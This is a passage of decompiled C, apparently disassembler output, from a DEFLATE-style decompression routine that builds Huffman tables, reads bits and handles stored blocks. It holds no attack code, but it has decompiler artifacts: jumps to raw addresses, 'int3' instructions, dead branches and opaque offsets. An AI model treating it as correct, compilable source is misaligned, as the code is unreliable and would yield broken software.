    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					while( *(_t2870 - 0x5c) <= 0x11f) {
    																						 *( *(_t2870 - 0x60)) = 8;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					L231:
    																					L233:
    																					if( *( *(_t2870 + 8) + 0x18) < 0) {
    																						goto L350;
    																					} else {
    																						 *((intOrPtr*)(_t2870 - 0x68)) =  *(_t2870 + 8) + 0x40 +  *( *(_t2870 + 8) + 0x18) * 0xda0;
    																						_push(0x40);
    																						_push(0);
    																						_push(_t2870 - 0x1a8);
    																						 *( *0x00CE9D9D)();
    																						_push(0x800);
    																						_push(0);
    																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x120);
    																						 *( *0x00CE9D9D)();
    																						_push(0x480);
    																						_push(0);
    																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x920);
    																						 *( *0x00CE9D9D)();
    																						_t2873 = _t2873 + 0x24;
    																						 *(_t2870 - 0x64) = 0;
    																						while( *(_t2870 - 0x64) <  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
    																							 *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) =  *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) + 1;
    																							 *(_t2870 - 0x64) =  *(_t2870 - 0x64) + 1;
    																						}
    																						 *(_t2870 - 0xd8) = 0;
    																						 *(_t2870 - 0x9c) = 0;
    																						_t1692 = 4 << 0;
    																						 *(_t2870 + 0xfffffffffffffe9c) = 0;
    																						_t2465 = 0;
    																						 *(_t2870 + 0xfffffffffffffe98) = 0;
    																						 *(_t2870 - 0x64) = 1;
    																						while( *(_t2870 - 0x64) <= 0xf) {
    																							 *(_t2870 - 0xd8) =  *(_t2870 - 0xd8) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8));
    																							 *(_t2870 - 0x9c) =  *(_t2870 - 0x9c) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8)) << 1;
    																							_t2465 =  *(_t2870 - 0x64);
    																							 *(_t2870 + _t2465 * 4 - 0x164) =  *(_t2870 - 0x9c);
    																							_t1692 =  *(_t2870 - 0x64) + 1;
    																							 *(_t2870 - 0x64) = _t1692;
    																						}
    																						if( *(_t2870 - 0x9c) == 0x10000 ||  *(_t2870 - 0xd8) <= 1) {
    																							 *(_t2870 - 0x78) = 0xffffffff;
    																							 *(_t2870 - 0x80) = 0;
    																							while(1) {
    																								_t2666 =  *(_t2870 - 0x80);
    																								if(_t2666 >=  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
    																									break;
    																								}
    																								 *(_t2870 - 0x34) = 0;
    																								 *(_t2870 - 0x74) =  *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x80)) & 0x000000ff;
    																								if( *(_t2870 - 0x74) != 0) {
    																									 *(_t2870 - 0xe8) =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168);
    																									_t2719 =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) + 1;
    																									 *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) = _t2719;
    																									_t2331 =  *(_t2870 - 0x74);
    																									 *(_t2870 - 0xc8) = _t2331;
    																									while( *(_t2870 - 0xc8) > 0) {
    																										_t2331 =  *(_t2870 - 0x34) << 0x00000001 |  *(_t2870 - 0xe8) & 0x00000001;
    																										 *(_t2870 - 0x34) = _t2331;
    																										_t2719 =  *(_t2870 - 0xc8) - 1;
    																										 *(_t2870 - 0xc8) = _t2719;
    																										 *(_t2870 - 0xe8) =  *(_t2870 - 0xe8) >> 1;
    																									}
    																									if( *(_t2870 - 0x74) > 0xa) {
    																										 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2));
    																										if( *(_t2870 - 0x6c) == 0) {
    																											 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2)) =  *(_t2870 - 0x78);
    																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
    																											 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
    																										}
    																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 9;
    																										 *(_t2870 - 0xd0) =  *(_t2870 - 0x74);
    																										while( *(_t2870 - 0xd0) > 0xb) {
    																											 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
    																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
    																											if( *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) != 0) {
    																												 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2));
    																											} else {
    																												 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x78);
    																												 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
    																												 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
    																											}
    																											 *(_t2870 - 0xd0) =  *(_t2870 - 0xd0) - 1;
    																										}
    																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
    																										 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
    																										 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x80);
    																									} else {
    																										 *((short*)(_t2870 - 0xcc)) =  *(_t2870 - 0x74) << 0x00000009 |  *(_t2870 - 0x80);
    																										while( *(_t2870 - 0x34) < 0x400) {
    																											goto 0x140ab1;
    																											asm("int3");
    																											 *((short*)(_t2719 + 0x120 + _t2331 * 2)) =  *((intOrPtr*)(_t2870 - 0xcc));
    																											_t2331 =  *(_t2870 - 0x74);
    																											_t2719 = (1 << _t2331) +  *(_t2870 - 0x34);
    																											 *(_t2870 - 0x34) = 1;
    																										}
    																									}
    																									goto L248;
    																								} else {
    																									L248:
    																									 *(_t2870 - 0x80) =  *(_t2870 - 0x80) + 1;
    																									continue;
    																								}
    																								break;
    																							}
    																							if( *( *(_t2870 + 8) + 0x18) != 2) {
    																								L349:
    																								_t2086 =  *( *(_t2870 + 8) + 0x18) - 1;
    																								 *( *(_t2870 + 8) + 0x18) = _t2086;
    																								goto L233;
    																							} else {
    																								 *(_t2870 - 0x10) = 0;
    																								L274:
    																								_t2669 =  *(_t2870 + 8);
    																								_t1900 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2666 * 0)) +  *((intOrPtr*)(_t2669 + 0x30));
    																								if( *(_t2870 - 0x10) >= _t1900) {
    																									_t2086 = 4 << 0;
    																									_t2465 =  *(_t2870 + 8);
    																									_t1903 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2669 * 0)) +  *((intOrPtr*)(_t2465 + 0x30));
    																									if(_t1903 ==  *(_t2870 - 0x10)) {
    																										_push( *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1903 * 0)));
    																										_push( *(_t2870 + 8) + 0x2924);
    																										_push( *(_t2870 + 8) + 0x40);
    																										 *((intOrPtr*)( *0x0013C1F0))();
    																										_push( *( *(_t2870 + 8) + 0xbadbd9));
    																										_push( *(_t2870 + 8) +  *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) + 0x2924);
    																										_push( *(_t2870 + 8) + 0xbadbed);
    																										 *((intOrPtr*)( *((intOrPtr*)(0x13c1f0))))();
    																										_t2873 = _t2873 + 0x18;
    																										goto L349;
    																									} else {
    																										L344:
    																										 *(_t2870 - 0x1c) = 0xffffffff;
    																										_t1692 =  *(_t2870 + 8);
    																										 *_t1692 = 0x15;
    																									}
    																								} else {
    																									L276:
    																									if( *(_t2870 - 8) >= 0xf) {
    																										L307:
    																										_t2296 =  *((short*)( *(_t2870 + 8) + (_t1900 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																										 *(_t2870 - 0x40) = _t2296;
    																										if( *(_t2870 - 0x40) < 0) {
    																											 *(_t2870 - 0x48) = 0xa;
    																											do {
    																												 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2296 << 1) + 0x40 + 0x920 + ( !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001)) * 2));
    																												_t2296 =  *(_t2870 - 0x48) + 1;
    																												 *(_t2870 - 0x48) = _t2296;
    																											} while ( *(_t2870 - 0x40) < 0);
    																										} else {
    																											 *(_t2870 - 0x48) =  *(_t2870 - 0x40) >> 9;
    																											 *(_t2870 - 0x40) =  *(_t2870 - 0x40) & 0x000001ff;
    																										}
    																										 *(_t2870 - 0x28) =  *(_t2870 - 0x40);
    																										_t1900 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x48);
    																										 *(_t2870 - 0xc) = _t1900;
    																										_t2086 =  *(_t2870 - 8) -  *(_t2870 - 0x48);
    																										 *(_t2870 - 8) = _t2086;
    																										_t2465 = 0;
    																										if(0 != 0) {
    																											goto L276;
    																										} else {
    																											if( *(_t2870 - 0x28) >= 0x10) {
    																												if( *(_t2870 - 0x28) != 0x10 ||  *(_t2870 - 0x10) != 0) {
    																													_t1937 =  *(_t2870 - 0x28);
    																													_t841 = _t1937 + 0x13b004; // 0x70302
    																													_t2315 =  *_t841;
    																													 *(_t2870 - 0x24) = _t2315;
    																													L322:
    																													if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
    																														L336:
    																														goto 0x140b37;
    																														asm("int3");
    																														asm("int3");
    																														asm("int3");
    																														 *(_t2870 - 0x8c) = (_t1937 << _t2315) - 0x00000001 &  *(_t2870 - 0xc);
    																														 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
    																														_t1937 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
    																														 *(_t2870 - 8) = _t1937;
    																														_t2315 = 0;
    																														if(0 != 0) {
    																															goto L322;
    																														} else {
    																															 *(_t2870 - 0x8c) =  *((char*)( *(_t2870 - 0x28) + 0x13b008)) +  *(_t2870 - 0x8c);
    																															if( *(_t2870 - 0x28) != 0x10) {
    																																 *(_t2870 - 0x108) = 0;
    																															} else {
    																																 *(_t2870 - 0x108) =  *( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2923) & 0x000000ff;
    																															}
    																															_push( *(_t2870 - 0x8c));
    																															_push( *(_t2870 - 0x108));
    																															_push( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924);
    																															_t2666 = 4 << 0;
    																															 *((intOrPtr*)( *0x0013C1F4))();
    																															_t2873 = _t2873 + 0xc;
    																															 *(_t2870 - 0x10) =  *(_t2870 - 0x10) +  *(_t2870 - 0x8c);
    																															goto L274;
    																														}
    																													} else {
    																														L323:
    																														_t1692 =  *(_t2870 - 4);
    																														if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																															 *(_t2870 - 0xbc) =  *( *(_t2870 - 4)) & 0x000000ff;
    																															 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																															goto L334;
    																														} else {
    																															L324:
    																															_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																															if(_t2086 == 0) {
    																																 *(_t2870 - 0xbc) = 0;
    																																L332:
    																																L334:
    																																if(0 != 0) {
    																																	goto L323;
    																																} else {
    																																	_t1937 =  *(_t2870 - 0xbc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																																	 *(_t2870 - 0xc) = _t1937;
    																																	_t2315 =  *(_t2870 - 8) + 8;
    																																	 *(_t2870 - 8) = _t2315;
    																																	if( *(_t2870 - 8) <  *(_t2870 - 0x24)) {
    																																		goto L323;
    																																	} else {
    																																		goto L336;
    																																	}
    																																}
    																															} else {
    																																L325:
    																																 *(_t2870 - 0x1c) = 1;
    																																_t2465 =  *(_t2870 + 8);
    																																 *_t2465 = 0x12;
    																															}
    																														}
    																													}
    																												} else {
    																													L318:
    																													 *(_t2870 - 0x1c) = 0xffffffff;
    																													_t1692 =  *(_t2870 + 8);
    																													 *_t1692 = 0x11;
    																												}
    																											} else {
    																												 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924)) =  *(_t2870 - 0x28);
    																												_t2666 =  *(_t2870 - 0x10) + 1;
    																												 *(_t2870 - 0x10) = _t2666;
    																												goto L274;
    																											}
    																										}
    																									} else {
    																										if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
    																											_t1900 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
    																											 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
    																											 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    																											 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    																											goto L307;
    																										} else {
    																											L278:
    																											_t2694 =  *((short*)( *(_t2870 + 8) + (_t2086 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																											 *(_t2870 - 0x40) = _t2694;
    																											if( *(_t2870 - 0x40) < 0) {
    																												if( *(_t2870 - 8) <= 0xa) {
    																													goto L291;
    																												} else {
    																													 *(_t2870 - 0x48) = 0xa;
    																													do {
    																														_t1900 =  !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001);
    																														 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2694 << 1) + 0x40 + 0x920 + _t1900 * 2));
    																														_t2694 =  *(_t2870 - 0x48) + 1;
    																														 *(_t2870 - 0x48) = _t2694;
    																														if( *(_t2870 - 0x40) < 0) {
    																															goto L288;
    																														}
    																														break;
    																														L288:
    																														_t1900 =  *(_t2870 - 0x48) + 1;
    																													} while ( *(_t2870 - 8) >= _t1900);
    																													if( *(_t2870 - 0x40) < 0) {
    																														goto L291;
    																													} else {
    																														goto L304;
    																													}
    																												}
    																											} else {
    																												_t1900 =  *(_t2870 - 0x40) >> 9;
    																												 *(_t2870 - 0x48) = _t1900;
    																												if( *(_t2870 - 0x48) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x48)) {
    																													L291:
    																													_t2086 =  *(_t2870 - 4);
    																													if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																														 *(_t2870 - 0xb4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																														 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																														goto L302;
    																													} else {
    																														L292:
    																														_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																														if(_t2465 == 0) {
    																															 *(_t2870 - 0xb4) = 0;
    																															L300:
    																															L302:
    																															if(0 != 0) {
    																																goto L291;
    																															} else {
    																																_t2086 =  *(_t2870 - 8);
    																																 *(_t2870 - 0xc) =  *(_t2870 - 0xb4) << _t2086 |  *(_t2870 - 0xc);
    																																_t1900 =  *(_t2870 - 8) + 8;
    																																 *(_t2870 - 8) = _t1900;
    																																if( *(_t2870 - 8) < 0xf) {
    																																	goto L278;
    																																} else {
    																																	goto L304;
    																																}
    																															}
    																														} else {
    																															L293:
    																															 *(_t2870 - 0x1c) = 1;
    																															_t1692 =  *(_t2870 + 8);
    																															 *_t1692 = 0x10;
    																														}
    																													}
    																												} else {
    																													L304:
    																													goto L307;
    																												}
    																											}
    																										}
    																									}
    																								}
    																							}
    																						} else {
    																							L244:
    																							 *(_t2870 - 0x1c) = 0xffffffff;
    																							_t2086 =  *(_t2870 + 8);
    																							 *_t2086 = 0x23;
    																						}
    																					}
    																				}
    																			} else {
    																				L165:
    																				 *(_t2870 - 0x1c) = 0xffffffff;
    																				_t2465 =  *(_t2870 + 8);
    																				 *_t2465 = 0xa;
    																			}
    																		} else {
    																			L64:
    																			if( *(_t2870 - 8) >= ( *(_t2870 - 8) & 0x00000007)) {
    																				L78:
    																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> ( *(_t2870 - 8) & 0x00000007);
    																				_t2018 =  *(_t2870 - 8) & 0x00000007;
    																				 *(_t2870 - 8) =  *(_t2870 - 8) - _t2018;
    																				if(0 != 0) {
    																					goto L64;
    																				} else {
    																					 *(_t2870 - 0x10) = 0;
    																					L81:
    																					if( *(_t2870 - 0x10) >= 4) {
    																						 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x2920 + _t2018 * 0) & 0x000000ff | ( *( *(_t2870 + 8) + 0xbb04cd) & 0x000000ff) << 0x00000008;
    																						_t2465 =  *(_t2870 + 8);
    																						_t1692 = ( *(_t2465 + 0x2923) & 0x000000ff) << 8;
    																						if( *(_t2870 - 0x10) == (( *( *(_t2870 + 8) + 0xbb04cd) & 0x000000ff | _t1692) ^ 0x0000ffff)) {
    																							L117:
    																							if( *(_t2870 - 0x10) == 0 ||  *(_t2870 - 8) == 0) {
    																								L139:
    																								if( *(_t2870 - 0x10) == 0) {
    																									goto L531;
    																								} else {
    																									L140:
    																									_t1692 =  *(_t2870 - 0x14);
    																									if(_t1692 <  *((intOrPtr*)(_t2870 - 0x70))) {
    																										L144:
    																										_t1692 =  *(_t2870 - 4);
    																										if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																											if( *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14) >=  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4)) {
    																												 *((intOrPtr*)(_t2870 - 0x104)) =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    																											} else {
    																												 *((intOrPtr*)(_t2870 - 0x104)) =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
    																											}
    																											if( *((intOrPtr*)(_t2870 - 0x104)) >=  *(_t2870 - 0x10)) {
    																												 *(_t2870 - 0x100) =  *(_t2870 - 0x10);
    																											} else {
    																												if( *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14) >=  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4)) {
    																													 *(_t2870 - 0xfc) =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    																												} else {
    																													 *(_t2870 - 0xfc) =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
    																												}
    																												 *(_t2870 - 0x100) =  *(_t2870 - 0xfc);
    																											}
    																											 *(_t2870 - 0x94) =  *(_t2870 - 0x100);
    																											_push( *(_t2870 - 0x94));
    																											_push( *(_t2870 - 4));
    																											_push( *(_t2870 - 0x14));
    																											 *((intOrPtr*)( *((intOrPtr*)(0x13c1f0))))();
    																											_t2873 = _t2873 + 0xc;
    																											 *(_t2870 - 4) =  *(_t2870 - 4) +  *(_t2870 - 0x94);
    																											_t2465 =  *(_t2870 - 0x14) +  *(_t2870 - 0x94);
    																											 *(_t2870 - 0x14) = _t2465;
    																											 *(_t2870 - 0x10) =  *(_t2870 - 0x10) -  *(_t2870 - 0x94);
    																											goto L139;
    																										} else {
    																											_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																											if(_t2086 == 0) {
    																												L149:
    																												 *(_t2870 - 0x1c) = 0xffffffff;
    																												_t2086 =  *(_t2870 + 8);
    																												 *_t2086 = 0x28;
    																											} else {
    																												L146:
    																												 *(_t2870 - 0x1c) = 1;
    																												_t2465 =  *(_t2870 + 8);
    																												 *_t2465 = 0x26;
    																											}
    																										}
    																									} else {
    																										L141:
    																										 *(_t2870 - 0x1c) = 2;
    																										_t2086 =  *(_t2870 + 8);
    																										 *_t2086 = 9;
    																									}
    																								}
    																							} else {
    																								L119:
    																								if( *(_t2870 - 8) >= 8) {
    																									L133:
    																									 *(_t2870 - 0x28) =  *(_t2870 - 0xc) & 0x000000ff;
    																									 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 8;
    																									 *(_t2870 - 8) =  *(_t2870 - 8) - 8;
    																									_t2086 = 0;
    																									if(0 != 0) {
    																										goto L119;
    																									} else {
    																										L134:
    																										_t2465 =  *(_t2870 - 0x14);
    																										if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
    																											 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x28);
    																											 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
    																											_t2465 =  *(_t2870 - 0x10) - 1;
    																											 *(_t2870 - 0x10) = _t2465;
    																											goto L117;
    																										} else {
    																											L135:
    																											 *(_t2870 - 0x1c) = 2;
    																											_t1692 =  *(_t2870 + 8);
    																											 *_t1692 = 0x34;
    																										}
    																									}
    																								} else {
    																									L120:
    																									_t2086 =  *(_t2870 - 4);
    																									if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																										 *(_t2870 - 0xb8) =  *( *(_t2870 - 4)) & 0x000000ff;
    																										 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																										goto L131;
    																									} else {
    																										L121:
    																										_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																										if(_t2465 == 0) {
    																											 *(_t2870 - 0xb8) = 0;
    																											L129:
    																											L131:
    																											if(0 != 0) {
    																												goto L120;
    																											} else {
    																												 *(_t2870 - 0xc) =  *(_t2870 - 0xb8) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																												 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																												if( *(_t2870 - 8) < 8) {
    																													goto L120;
    																												} else {
    																													goto L133;
    																												}
    																											}
    																										} else {
    																											L122:
    																											 *(_t2870 - 0x1c) = 1;
    																											_t1692 =  *(_t2870 + 8);
    																											 *_t1692 = 0x33;
    																										}
    																									}
    																								}
    																							}
    																						} else {
    																							L114:
    																							 *(_t2870 - 0x1c) = 0xffffffff;
    																							_t2086 =  *(_t2870 + 8);
    																							 *_t2086 = 0x27;
    																						}
    																					} else {
    																						if( *(_t2870 - 8) == 0) {
    																							L99:
    																							_t1692 =  *(_t2870 - 4);
    																							if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																								 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2920)) =  *( *(_t2870 - 4));
    																								 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																								goto L110;
    																							} else {
    																								L100:
    																								_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																								if(_t2086 == 0) {
    																									 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2920)) = 0;
    																									L108:
    																									L110:
    																									if(0 != 0) {
    																										goto L99;
    																									} else {
    																										goto L111;
    																									}
    																								} else {
    																									L101:
    																									 *(_t2870 - 0x1c) = 1;
    																									_t2465 =  *(_t2870 + 8);
    																									 *_t2465 = 7;
    																								}
    																							}
    																						} else {
    																							L83:
    																							if( *(_t2870 - 8) >= 8) {
    																								L97:
    																								 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2920)) =  *(_t2870 - 0xc) & 0x000000ff;
    																								 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 8;
    																								 *(_t2870 - 8) =  *(_t2870 - 8) - 8;
    																								if(0 != 0) {
    																									goto L83;
    																								} else {
    																									L111:
    																									_t2018 =  *(_t2870 - 0x10) + 1;
    																									 *(_t2870 - 0x10) = _t2018;
    																									goto L81;
    																								}
    																							} else {
    																								L84:
    																								_t2086 =  *(_t2870 - 4);
    																								if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																									 *(_t2870 - 0xec) =  *( *(_t2870 - 4)) & 0x000000ff;
    																									 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																									goto L95;
    																								} else {
    																									L85:
    																									_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																									if(_t2465 == 0) {
    																										 *(_t2870 - 0xec) = 0;
    																										L93:
    																										L95:
    																										if(0 != 0) {
    																											goto L84;
    																										} else {
    																											 *(_t2870 - 0xc) =  *(_t2870 - 0xec) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																											 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																											if( *(_t2870 - 8) < 8) {
    																												goto L84;
    																											} else {
    																												goto L97;
    																											}
    																										}
    																									} else {
    																										L86:
    																										 *(_t2870 - 0x1c) = 1;
    																										_t1692 =  *(_t2870 + 8);
    																										 *_t1692 = 6;
    																									}
    																								}
    																							}
    																						}
    																					}
    																				}
    																			} else {
    																				L65:
    																				_t2465 =  *(_t2870 - 4);
    																				if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																					 *(_t2870 - 0xb0) =  *( *(_t2870 - 4)) & 0x000000ff;
    																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																					goto L76;
    																				} else {
    																					L66:
    																					_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																					if(_t1692 == 0) {
    																						 *(_t2870 - 0xb0) = 0;
    																						L74:
    																						L76:
    																						if(0 != 0) {
    																							goto L65;
    																						} else {
    																							 *(_t2870 - 0xc) =  *(_t2870 - 0xb0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																							 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																							if( *(_t2870 - 8) < ( *(_t2870 - 8) & 0x00000007)) {
    																								goto L65;
    																							} else {
    																								goto L78;
    																							}
    																						}
    																					} else {
    																						L67:
    																						 *(_t2870 - 0x1c) = 1;
    																						_t2086 =  *(_t2870 + 8);
    																						 *_t2086 = 5;
    																					}
    																				}
    																			}
    																		}
    																	}
    																} else {
    																	L49:
    																	_t2465 =  *(_t2870 - 4);
    																	if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																		 *(_t2870 - 0xe4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																		 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																		goto L60;
    																	} else {
    																		L50:
    																		_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																		if(_t1692 == 0) {
    																			 *(_t2870 - 0xe4) = 0;
    																			L58:
    																			L60:
    																			if(0 != 0) {
    																				goto L49;
    																			} else {
    																				 *(_t2870 - 0xc) =  *(_t2870 - 0xe4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																				 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																				if( *(_t2870 - 8) < 3) {
    																					goto L49;
    																				} else {
    																					goto L62;
    																				}
    																			}
    																		} else {
    																			L51:
    																			 *(_t2870 - 0x1c) = 1;
    																			_t2086 =  *(_t2870 + 8);
    																			 *_t2086 = 3;
    																		}
    																	}
    																}
    															} else {
    																_t2086 =  *(_t2870 + 0x20) & 0x00000001;
    																if(_t2086 == 0) {
    																	L581:
    																	 *(_t2870 - 0x1c) = 0;
    																	_t2465 =  *(_t2870 + 8);
    																	 *_t2465 = 0x22;
    																} else {
    																	L533:
    																	if( *(_t2870 - 8) >= ( *(_t2870 - 8) & 0x00000007)) {
    																		L547:
    																		 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> ( *(_t2870 - 8) & 0x00000007);
    																		_t2086 =  *(_t2870 - 8) & 0x00000007;
    																		 *(_t2870 - 8) =  *(_t2870 - 8) - _t2086;
    																		_t1692 = 0;
    																		if(0 != 0) {
    																			goto L533;
    																		} else {
    																			 *(_t2870 - 0x10) = 0;
    																			L550:
    																			if( *(_t2870 - 0x10) >= 4) {
    																				goto L581;
    																			} else {
    																				if( *(_t2870 - 8) == 0) {
    																					L568:
    																					_t2465 =  *(_t2870 - 4);
    																					if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																						 *(_t2870 - 0x90) =  *( *(_t2870 - 4)) & 0x000000ff;
    																						 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																						goto L579;
    																					} else {
    																						L569:
    																						_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																						if(_t1692 == 0) {
    																							 *(_t2870 - 0x90) = 0;
    																							L577:
    																							L579:
    																							if(0 != 0) {
    																								goto L568;
    																							} else {
    																								goto L580;
    																							}
    																						} else {
    																							L570:
    																							 *(_t2870 - 0x1c) = 1;
    																							_t2086 =  *(_t2870 + 8);
    																							 *_t2086 = 0x2a;
    																						}
    																					}
    																				} else {
    																					L552:
    																					if( *(_t2870 - 8) >= 8) {
    																						L566:
    																						 *(_t2870 - 0x90) =  *(_t2870 - 0xc) & 0x000000ff;
    																						 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 8;
    																						 *(_t2870 - 8) =  *(_t2870 - 8) - 8;
    																						if(0 != 0) {
    																							goto L552;
    																						} else {
    																							L580:
    																							_t1692 =  *( *(_t2870 + 8) + 0x10) << 0x00000008 |  *(_t2870 - 0x90);
    																							 *( *(_t2870 + 8) + 0x10) = _t1692;
    																							_t2086 =  *(_t2870 - 0x10) + 1;
    																							 *(_t2870 - 0x10) = _t2086;
    																							goto L550;
    																						}
    																					} else {
    																						L553:
    																						_t2465 =  *(_t2870 - 4);
    																						if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
